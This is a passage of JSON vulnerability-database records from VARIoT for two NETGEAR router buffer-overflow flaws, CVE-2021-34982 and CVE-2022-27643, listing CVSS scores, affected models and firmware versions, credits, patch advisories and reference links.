"id": "JVNDB-2021-021931"
},
{
"db": "NVD",
"id": "CVE-2021-34982"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sungur Labs",
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2193"
}
],
"trust": 1.3
},
"cve": "CVE-2021-34982",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2021-34982",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-021931",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2021-34982",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2021-34982",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-021931",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2021-34982",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-2193",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021931"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2193"
},
{
"db": "NVD",
"id": "CVE-2021-34982"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NETGEAR Multiple Routers httpd Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of multiple NETGEAR routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the httpd service, which listens on TCP port 80 by default. When parsing the strings file, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13709. DC112A firmware, EX3700 firmware, EX3800 Multiple Netgear products, including firmware, contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-34982"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021931"
},
{
"db": "ZDI",
"id": "ZDI-21-1274"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-34982",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-21-1274",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021931",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-13709",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2193",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021931"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2193"
},
{
"db": "NVD",
"id": "CVE-2021-34982"
}
]
},
"id": "VAR-202110-1806",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4290225903571429
},
"last_update_date": "2025-08-16T23:08:29.384000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NETGEAR has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://kb.netgear.com/000064313/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Extenders-Routers-and-DSL-Modem-Routers-PSV-2021-0159"
},
{
"title": "Netgear NETGEAR Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=167952"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2193"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-021931"
},
{
"db": "NVD",
"id": "CVE-2021-34982"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://kb.netgear.com/000064313/security-advisory-for-pre-authentication-buffer-overflow-on-some-extenders-routers-and-dsl-modem-routers-psv-2021-0159"
},
{
"trust": 2.4,
"url": "https://www.zerodayinitiative.com/advisories/zdi-21-1274/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34982"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021931"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2193"
},
{
"db": "NVD",
"id": "CVE-2021-34982"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021931"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2193"
},
{
"db": "NVD",
"id": "CVE-2021-34982"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-29T00:00:00",
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"date": "2025-08-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-021931"
},
{
"date": "2021-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-2193"
},
{
"date": "2024-05-07T23:15:13.400000",
"db": "NVD",
"id": "CVE-2021-34982"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-29T00:00:00",
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"date": "2025-08-15T07:39:00",
"db": "JVNDB",
"id": "JVNDB-2021-021931"
},
{
"date": "2021-11-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-2193"
},
{
"date": "2025-08-14T01:41:19.343000",
"db": "NVD",
"id": "CVE-2021-34982"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Out-of-bounds write vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-021931"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-2193"
}
],
"trust": 0.6
}
}
VAR-202203-1667
Vulnerability from variot - Updated: 2025-08-06 22:55This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of SOAP requests. When parsing the SOAPAction header, the process does not properly validate the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15692. R6400 firmware, R6700 firmware, R6900P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The NETGEAR R6700v3 is a Nighthawk AC1750 Smart Dual-Band Gigabit Router from NETGEAR
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202203-1667",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.126"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.72"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.126"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "r7960p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.80"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "rax75",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "dc112a",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.80"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "r7850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.84"
},
{
"model": "rs400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.5.1.86"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.158"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.11.134"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.3.88"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.114"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.84"
},
{
"model": "xr300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.72"
},
{
"model": "rax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "rax200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.138"
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7960p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7100lg",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7850",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6700",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "wndr3400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "rs400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6900p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "wnr3500l",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "rax75",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7900p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "rax80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "rax200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6700v3",
"scope": null,
"trust": 0.7,
"vendor": "netgear",
"version": null
},
{
"model": "r6700v3 1.0.4.120 10.0.91",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021794"
},
{
"db": "NVD",
"id": "CVE-2022-27643"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stephen Fewer of Relyze Software Limited (www.relyze.com)",
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2053"
}
],
"trust": 1.3
},
"cve": "CVE-2022-27643",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-17535",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2022-27643",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2022-27643",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2022-27643",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2022-27643",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2022-27643",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-27643",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2022-27643",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-17535",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-2053",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021794"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2053"
},
{
"db": "NVD",
"id": "CVE-2022-27643"
},
{
"db": "NVD",
"id": "CVE-2022-27643"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of SOAP requests. When parsing the SOAPAction header, the process does not properly validate the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15692. R6400 firmware, R6700 firmware, R6900P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The NETGEAR R6700v3 is a Nighthawk AC1750 Smart Dual-Band Gigabit Router from NETGEAR",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-27643"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021794"
},
{
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"db": "VULMON",
"id": "CVE-2022-27643"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-27643",
"trust": 4.6
},
{
"db": "ZDI",
"id": "ZDI-22-519",
"trust": 3.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021794",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-15692",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-17535",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032410",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2053",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-27643",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"db": "VULMON",
"id": "CVE-2022-27643"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021794"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2053"
},
{
"db": "NVD",
"id": "CVE-2022-27643"
}
]
},
"id": "VAR-202203-1667",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-17535"
}
],
"trust": 0.9574690457894737
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-17535"
}
]
},
"last_update_date": "2025-08-06T22:55:28.160000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NETGEAR has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://kb.netgear.com/000064720/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Multiple-Products-PSV-2021-0323"
},
{
"title": "Patch for NETGEAR R6700v3 Authorization Issue Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/713031"
},
{
"title": "NETGEAR R6700v3 Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=231212"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/H4lo/awesomt-IoT-security-article "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/H4lo/awesome-IoT-security-article "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"db": "VULMON",
"id": "CVE-2022-27643"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2053"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-021794"
},
{
"db": "NVD",
"id": "CVE-2022-27643"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.7,
"url": "https://www.zerodayinitiative.com/advisories/zdi-22-519/"
},
{
"trust": 3.1,
"url": "https://kb.netgear.com/000064720/security-advisory-for-pre-authentication-buffer-overflow-on-multiple-products-psv-2021-0323"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27643"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-27643/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032410"
},
{
"trust": 0.1,
"url": "https://github.com/h4lo/awesomt-iot-security-article"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"db": "VULMON",
"id": "CVE-2022-27643"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-021794"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2053"
},
{
"db": "NVD",
"id": "CVE-2022-27643"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-22-519"
},
{
"db": "CNVD",
"id": "CNVD-2025-17535"
},
{
"db": "VULMON",
"id": "CVE-2022-27643"
},
{
"db": "JVNDB",
